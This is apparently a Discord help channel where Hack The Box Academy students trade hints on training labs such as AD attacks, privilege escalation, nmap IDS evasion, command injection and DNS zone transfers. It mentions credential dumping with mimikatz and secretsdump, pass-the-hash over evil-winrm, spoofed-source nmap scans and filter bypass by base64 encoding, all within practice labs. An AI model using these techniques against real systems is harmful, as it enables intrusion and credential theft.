Having some difficulties with this one. I've already examined the local.rules file, reviewed its content, and explored Wireshark. However, I'm still struggling to pinpoint the XX Byte Value I'm supposed to be looking for... Not sure where to go from here

Working with IDS/IPS > Skills Assessment - Snort

There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique which involves Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer.

heavy edge
#

am i supposed to read this via comman or with the output stay the same if i download

#

i connected with smbclient \\DC01\julio\ -k and the flag isnt taking

#

i used the get command tho

fathom pendant
#

if you do dir is the flag in that directory?

heavy edge
#

oh my fucking got

fathom pendant
#

"flag isn't taking" also isn't descriptive

#

are you in a directory you can write to?

heavy edge
#

do you see my error

fathom pendant
heavy edge
#

IM SO DONE

potent ermine
heavy edge
candid lily
#

anyone did this is malware analysis module?

#

when ever i change the instruction and run, it keeps changing back to original

heavy edge
#

seeing what i could do with some simple hashes and such.

#

still cant believe i 2headed that flag

fathom pendant
#

at least that's my initial thought ¯_(ツ)_/¯

candid lily
#

do i have to? how

compact halo
#

Is anyone else's vm not spawning

fathom pendant
#

it won't update unless you save, even in a debugger you have to save before your run it

candid lily
#

hmm lemme try i dont remember seeing an save option

#

idk there is no option to save

#

i guess i have to set breakpoints before it and change all of it everytime :(

#

doing with htb laggy rdp is just pure pain

zinc mason
candid lily
#

wft its just so confusing, i saved into a different file and its back to original still

hexed spindle
#

Working on AD Enumeration & Attacks - Skills Assessment Part I. Can the answer to question 2 be found using the webshell or am I missing something in my enumeration step? I tried importing powershell modules and didnt have any luck so far.

candid lily
#

dns is not working :(

dim wolf
#

nah wait i'm bad this is for the debugging part isn't it

candid lily
#

yes

#

this is killing me

dim wolf
#

i mean.. maybe it works? did you try capturing connections with inetsim?

candid lily
#

it is not listening i saw using netstat

#

im gonna try with pwnbox

#

what hurts more than breakup is clicking and waiting for response on screen on this shitty rdp

fathom pendant
#

unless i'm just missing something

candid lily
#

no i checked netstat all others were there except dns

heavy edge
#

Was about to say I see a pid

fathom pendant
#

so the PID isn't there?

#

also are you sure you're not meant to launch this on the target machine?

#

or is this just part of the steps

#

i haven't done this module so idk

candid lily
#

i see this in my nightmares now

shut quest
candid lily
#

i applied all patches still it reached sandbox detected

#

at this rate imma just get the malware on my pc and let it destroy it

shut quest
#

and to confirm, you did edit the inetsim config?

candid lily
#

yes

#

htb rdp is unusable i giveup

blissful elm
#

hey is there a way to diff a two same looking source code,string etc like this in vscode

blissful elm
chrome lodge
#

Hey, whats up guys I'm new. I have a question i signed up for HTB Academy and I have cubes but I can't unlock any of the modules anyone had that issue before?

#

trying to trouble shoot this

blissful elm
#

how much cubes u have

chrome lodge
#

says i have 60

#

and it was only 10 cubes for one of the ones i was trying to get

blissful elm
#

contact support chat

#

this at the right bottom of the htb

chrome lodge
#

copy thanks i'll give that a go

shut quest
# blissful elm

Right mouse click on file and click on "select for compare". Right mouse click on other file and click on "compare with selected"

blissful elm
#

yeh but its very ugly with no color

shut quest
blissful elm
#

i was doing wrong , now its showing color thx

noble tendon
#

can someone help me with the flag in Exploiting Web Vulnerabilities in Thick-Client Applications?

left egret
#

Hello, for "
Windows Privilege Escalation
Windows Privilege Escalation Skills Assessment - Part I ", to get privesc, I try JuicyPotato.exe via Metasploit but I have the error "COM -> recv failed with error: 10038". Do you know this problem ? With PrintSpoofer64.exe, the problem is "Operation failed or timed out.". Any tips ?

rustic sage
#

hey, can someone help me with the Firewall and IDS/IPS Evasion - Medium Lab in NETWORK ENUMERATION WITH NMAP module

#

sudo nmap target ip -sU -p 53 -Pn --script=dns-nsid

i tried this command, but iam olny getting output like:

Host is up.

PORT STATE SERVICE
53/tcp filtered domain

soft cedar
rustic sage
lavish mango
left egret
#

do you mean others methos about SeImpersonatePrivilege privesc ?

lavish mango
latent fox
#

I pay HTB academy for a month. Could I access the module that I complete it?

opaque gulch
#

I am new to htb and the whole scene of cybersec. Is it recommended that I complete all the fundamental modules provided before moving on? Or do you recommend something else? Thanks.

knotty crag
#

guys

#

my issue got solved

#

first i was having tun0 and tun1 configuration and then i only had tun0 configuration so the vpn worked and i was able to ping the targte machine

#

i just wanted to convey this so that it might help others as well and it would be a form of documentation and whatsoever so pls dont mind

#

guys i had one more doubt is it fine to use tor and proxychains together to stay anonymous or is it necessary to use a vpn like is vpn more reliable or proxychains + tor

#

pls do tell

agile token
#

If you ask why

#

Htb is a little bit more advanced

#

Not so much but i recommend to have understanding of everything in thm so htb will be easier

flint bane
#

Good advice

#

Just do pre security path and come to academy it finish Information security foundation skill path then start CPTS or CDSA whatever yo like

patent oak
#

Guys you know when base 64 encoding bash commands for Command Injections module.

#

Is it necessary to url encode / within that base64 string to be?

#

Or is the base 64 enough to bypass the filter for /

#

The skills assessment is taking my soul

sudden laurel
#

You don't need to URL encode the base64 string iirc

patent oak
#

As you said, without b64

#

Got it

#

That was awesome but painful

sudden laurel
#

there were a few ways you could get the flag for that skill assessment, you chose the hard way

soft cedar
#

^

#

Could have just use a simple obfuscation on the commands.

patent oak
#

I think I did it the easy way in the end. Just I was sorta trying for the whole command at once instead of getting it working bit by bit

winged egret
#

hello, just a question that has been intriguing me. In the nmap module it says that for IPS/IDS evasion we have to sometime specify a spoofed IP (-S) that is in the same subnet of the server for us to actually get a response back from the specified port. However, how does the server know how to route the traffic back to us if we spoof our IP and are on different subnets ?

half stag
#

Been working on Q8 of the AD Enumeration & Attacks - Skills Assessment Part II for the last few days. I got system on SQL01 and got the local admin hash so I can WINRM into SQL01 now. Used LaZagne, mimikatz, secretsdump, and manual search for things. I also have the creds of ms******. I have 2 users (AB*** and BR***) that can RDP into MS01 but am having a difficult time trying to get to admin on that box. Any hints would be appreciated. I’ve been doing these skills assessments for what feels like weeks now. Been reading and trying things and not having success

tiny epoch
#

What privileges does the current user you are logged in as have?

#

@half stag so you already have the flag off SQL01 , then the way to get to MS01 is in bloodhound and users rights

half stag
soft cedar
half stag
#

i should look for rights the user SQL01 has?

tiny epoch
#

Honestly i got to MS01 first and had to backtrack to SQL01

#

I would take a look at what users/credentials (hashes) you may already have that have access to things.

soft cedar
crystal steeple
half stag
crystal steeple
#

Try that , you probably gonna find something juicy there

half stag
#

dump it using mimikatz?

crystal steeple
#

You got system level on sql01, you should be able to access sam,system,security files

#

Or just try to secretsdump directly it may work , i personally dumped sam manually

half stag
left egret
analog hatch
#

Can anyone help me with "During our examination of the USN Journal within Timeline Explorer, we observed "uninstall.exe". The attacker subsequently renamed this file. Use Zone.Identifier information to determine its new name and enter it as your answer." in the "Rapid Triage Examination & Analysis Tools" module please? I've seen a couple hints in here but im still not getting it. I can see the Zone Identifier entry in mft.csv and can see in MFT-J.csv that it has been renamed but i cant find out the new name

half stag
#

i also tried PTH for the 172.16.7.50

soft cedar
half stag
#

i tried all of them

#

none of them worked

soft cedar
#

make sure you're running it against the whole subnet /24

half stag
#

nothing worked 😢

soft cedar
half stag
#

lsadump::sam

crystal steeple
#

Rdp wont work btw

half stag
#

evil-winrm

soft cedar
crystal steeple
#

from my notes, i got the admin hash and pth via evil-winrm

#

Then disabled that rdp restriction and logged in via rdp :v

crystal steeple
soft cedar
crystal steeple
#

But about that ms01 administrator idk , i got his hash from sam files but iirc others said mimikatz works

half stag
#

Was my hash correct?

steady dust
#

[ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

#

any ideas?

rustic sage
#

Boxes are showing high ms Howard’s 100,000ms I am located in the east coast

#

Upwards

steady dust
rustic sage
#

Anyone knows why I can’t chat in general

brazen saffron
#

About sqlmap, does there is a way to know what his a type of SQLi before running the cmd xd? I mean, they are not going to tell us during the CBBH exam so we will have to test everything one by one or there is something to try to find the type and use the correct format with sqlmap.

winged egret
#

hellog guys, regarding the nmap module: IDS/IPS evasion lab 1 (easy)
Im using this command : sudo nmap 10.129.2.28 -n -Pn -p445 -O -S 10.129.2.155 -e tun0 as it is the most relevant one based on the hint.
However nmap is throwing an error that theere is no route to the host.
Is it a bug ? because in the module this command worked . Or am I completely on the wrong track ?

brazen saffron
#

Did you started your VPN from HTB Academy?

toxic apex
#

Does anyone know what we're supposed to do in the Authentication Bypass section of Whitebox Attacks did they just use some completely different hash in the target vs the provided code?

winged egret
#

however I have to bypass the firewall so it gives me the OS info and the -S spoofed-ip -e tun0 is throwing an error others faced the same issue

#

am i on the right track ?

compact halo
#

PIVOTING, TUNNELING, AND PORT FORWARDING

Issues with SocksOverRDP

On the host, I am trying to run the SocksOverRDP-Plugin.dll with the command given.

I am hitting an error telling me that the socks... file contains a virus or a program not wanted -
This is the file directly from the link provided in the module.
Can someone assist with this please?

half stag
#

please help i am still stuck

short hare
fathom pendant
supple gorge
#

Anyone from htb can give a hint over the weekly streaks. I'm at 18 but I want to let it die... But I'd be saddened if htb rolls something out soon after that rewards something.

It's academy related, but i don't see a good channel, so I'm dropping it here for now

fathom pendant
#

Just shiny badges

supple gorge
fathom pendant
#

Yeah, and they hinted at the cwee cert for like 6 months. It's likely they're deliberating on what the reward(s) should be

#

It's likely they're gathering some base analytical data before moving forward with implementing anything

supple gorge
fathom pendant
supple gorge
fathom pendant
#

Answering a question counts as 1, and clicking the "complete and next" counts as 1

cloud urchin
#

i wish the extra stuff you did carried over to the weeks ahead

fathom pendant
#

Unless they very recently changed it

supple gorge
fathom pendant
#

¯_(ツ)_/¯

#

Just do a fundamental module

supple gorge
#

haha, thanks for answering Marcie. It's been a while

short hare
fathom pendant
queen oyster
#

I am currently stuck on the skill assessment of injection attacks, I found ||the internal service and the source code of the internal php but I'm not getting further now with the XPATHi, as far as I can see with my query 1+and+count(/*)=1 there is only the orders node and I have found no other orders except 1,2,3,4,5,6 & 1337 which don't seem to help too much, what obvious issue am I missing here? ||

heavy edge
#

if i understand correctly

#

this is an entirely different password than the one used 3 or so modules ago

#

nvm got it

heavy edge
#

realized that, i think that guy from yestrerday threw me off

fathom pendant
#

Also sections

#

Not modules, sections refer to the individual parts of a module

heavy edge
#

oh yeah duh

brazen saffron
fathom pendant
#

¯_(ツ)_/¯

#

That's what a fair bit of this field is

heavy edge
#

how would you go about getting the vhd for this situation

#

i havent attempted anything in this section yet, im just curious because isnt messing with local vhd's like admin only and such

#

what WOULD be the point of breaking BL if you are already ADMIN

latent glen
#

Hey everyone, I am doing thoing the linux privilege assessment - skills assessment. I am on flag 4, I think I've found the user ||tomcatadm|| but I cannot for the life of me find a password

#

could anyone please help?

molten current
#

guys please help am crying
been 3 hours on this and still cant figure this out
so the question is the last from the INFORMATION GATHERING - WEB EDITION modlue in the Active Subdomain Enumeration section
Submit the number of all "A" records from all zones as the answer.
Hint : There are several zones.

fathom pendant
#

You basically just transfer it from the victim to your system

next bronze
#

it can be found in a backup share, or the permissions isn't configured properly and you can read it

latent glen
#

nevermind

#

I think I found it

fringe urchin
latent glen
#

so I did find creds but they dont work

molten current
fringe urchin
fringe urchin
molten current
#

i used dig axfr

fringe urchin
# molten current i got 19

Yea thats a bit short of the correct number. I sadly am in a car and cant access my notes atm.

Is 19 only from one zone?

fathom pendant
#

maybe look within

molten current
#

i found this and tried all solutions

fathom pendant
#

it's a combination of the base zone + another zone

molten current
#

like main domain and sub domain ?

fathom pendant
#

yes

molten current
#

ohhhh

fathom pendant
#

so from inalnefreight.htb AND another one you can transfer to

#

hint localhost might show domains you can use

molten current
#

performing the subdomain brute forcing would help

fathom pendant
#

no need to bruteforce

molten current
#

just axfr ?

fathom pendant
#

yes

#

dig axfr subdomain.inlanefreight.htb @ip

molten current
#

can i send an image of the result

fathom pendant
#

nope

fringe urchin
#

You already answred a question above that there exist more then one zone. And the current question is asking how many A records are in all the zones you can access.

fathom pendant
#

also if it's not obvious replace "subdomain" with the actual valid domain you can transfer to

#

which you know about because you found the text records for it

#

if that's the only question you haven't answered

molten current
#

answered all

fathom pendant
#

yes

molten current
#

i got this ... is it related ?

fathom pendant
#

you're likely heavily overthinking it

fringe urchin
#

Yes but deleted it as it containst the answer

fathom pendant
#

my brother in christ: what subdomain did you query to get the txt record

#

that will answer how you find the A records for all zones

#

you add the 2 together

fringe urchin
#

You just manually count them how many A are there in both zones

fathom pendant
#

x A records from inlanefreight.htb, and y A records from <subdomain>.inlanefreight.htb

fathom pendant
molten current
#

x + y ?

fathom pendant
#

wc 🙏

fathom pendant
#

add them together and boom

#

there's your answer

fringe urchin
fringe urchin
# molten current x + y ?

You said in the first zone you counted 19 A records(dont know if its correct since i cant access my notes) now you count the A records on the other zone

And you put 19+ the other

fringe urchin
fringe urchin
molten current
#

i hate networking

#

its funny that am required to understand a field that got developed by thousands of minds

fathom pendant
#

and it's not like you have to master it

#

just understand the underlying concepts

molten current
#

when is the day that we will let LLMs do the pentest for us

fathom pendant
#

if you don't like networking, you'll really dislike AD enum and attacks

fathom pendant
fathom pendant
#

networking is a huge part of AD enum and attacks

#

and in the pivoting module

#

if you don't understand networking then it's not gonna be fun trying to understand why you can't just go from A -> C without B

molten current
fathom pendant
#

?

fringe urchin
#

Lol fk devin

molten current
#

devin ai

fathom pendant
#

bro if you're trying to learn this and you want an LLM to just do it for you; then there's no point in learning it imo

molten current
fathom pendant
#

the exam is gonna be brutal on you if you don't understand the concepts

molten current
fathom pendant
#

it's better than OSCP

#

it's hard, but fair

molten current
#

harder ?

#

oh

fathom pendant
#

everything on the exam is taught in the course

molten current
#

comparing to price its amazing

#

18 $ for just labs is damn cool

fathom pendant
#

that's it's other upside, cheaper course and exam but better quality

fathom pendant
#

the subs are separate on each site

fringe urchin
#

Or a student for 2 months

molten current
#

i think its 14 on app ?

molten current
#

8$

fringe urchin
#

Yea so its 8€ per months?

fathom pendant
#

yeah

molten current
#

yep

fringe urchin
#

That together is 16susge

fathom pendant
#

8 not 18

molten current
#

18 is without the student email ...

#

18 is for personal emails

fringe urchin
#

Oh what?

molten current
#

check plans

fringe urchin
#

Ah silver

molten current
fringe urchin
#

Yea ppl usually dont buy silver for cpts

molten current
#

who does guy Platinum

#

ohhh 38% discount

#

cool

fringe urchin
#

I would have go 2x plat if i didnt had student nail

#

And have left over cubes for different modules that would interest you

molten current
#

can I link the cert to my linkedin page ?

#

like as a badge

fathom pendant
#

for the same amount of cubes

molten current
#

still the answer

#

is wrong

#

wut am i doing wrong

fringe urchin
molten current
#

yeah

fringe urchin
#

How many have you found?

tulip dragon
#

when machine ip time over the sshed terminal tab become unusable is there any command to overcome this without closing that terminal tab

molten current
#

Ctrl + C ?

fathom pendant
tulip dragon
molten current
fathom pendant
fringe urchin
molten current
#

there is only 2 SOA

fathom pendant
heavy edge
fathom pendant
tulip dragon
fringe urchin
# tulip dragon yes yes

Try that from marcieLee if it works. But yea i usually just close the connection from anither temrinal

molten current
fathom pendant
#

they can be a vm file, or they can just be a partitioned record

tulip dragon
#

thx u all

next bronze
fringe urchin
fathom pendant
#

the number, i will say, is greater

molten current
#

they said 203 on forums but still wrong

#

lol

fringe urchin
fathom pendant
#

203 is definitely wrong

fringe urchin
#

Lol 203

fringe urchin